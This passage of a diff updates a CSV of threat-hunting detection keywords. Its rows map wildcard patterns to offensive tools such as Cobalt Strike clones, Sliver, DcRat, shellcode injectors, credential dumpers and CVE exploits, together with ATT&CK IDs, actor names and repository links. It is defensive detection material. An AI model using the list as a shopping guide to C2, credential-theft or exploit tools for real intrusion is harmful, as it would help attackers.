security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PhpSploit*","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2024","452","2023-08-23T13:08:08Z","2014-05-21T19:43:03Z" "*phra/Pezor/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*phuip-fpizdam*","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1767","261","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" -"*piata_ssh_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*phuip-fpizdam*","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. 
This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1766","261","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" +"*piata_ssh_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PIC-Exec*runshellcode.asm*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*PIC-Exec\addresshunter*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*PIC-Get-Privileges*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
@@ -14777,7 +14943,7 @@
 "*pip install rarce*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
 "*pip install --user fee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
 "*pip3 install bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
-"*pip3 install -U pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*pip3 install -U pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
 "*'pipename_stager'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
 "*PipeViewer.csproj*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z"
 "*PipeViewer_v1.1.zip*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z"
@@ -14791,12 +14957,12 @@
 "*pivotnacci *--polling-interval*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z"
 "*pivotnacci/0.0.1*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z"
 "*pivotnacci-master*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z"
-"*pivots/named-pipe_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z"
+"*pivots/named-pipe_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
 "*-pk8gege.org*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
 "*pkexec64.tar.gz*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
-"*pkt_comm/word_gen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*pkt_comm/word_list*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*plex_unpickle_dict_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*pkt_comm/word_gen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*pkt_comm/word_list*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*plex_unpickle_dict_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*plug_getpass_nps.dll*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z"
 "*plug_katz_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z"
 "*plug_qvte_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z"
@@ -14804,15 +14970,15 @@
 "*Plugins\AccessTokens\TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
 "*Plugins\AccessTokens\TokenManipulation*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
 "*Plugins\Execution\PSExec*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
-"*Plugins\SendFile.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
-"*Plugins\SendMemory.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*Plugins\SendFile.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*Plugins\SendMemory.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
 "*plummm/CVE-2022-27666*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z"
 "*pm3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*poc.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
 "*poc.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
 "*poc.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
 "*poc.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
-"*poc.exe*poc.txt*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
+"*poc.exe*poc.txt*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
 "*poc.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
 "*poc.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
 "*poc.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
@@ -14824,25 +14990,27 @@ "*poc.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" -"*POC_CloudFilter_ArbitraryFile_EoP*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
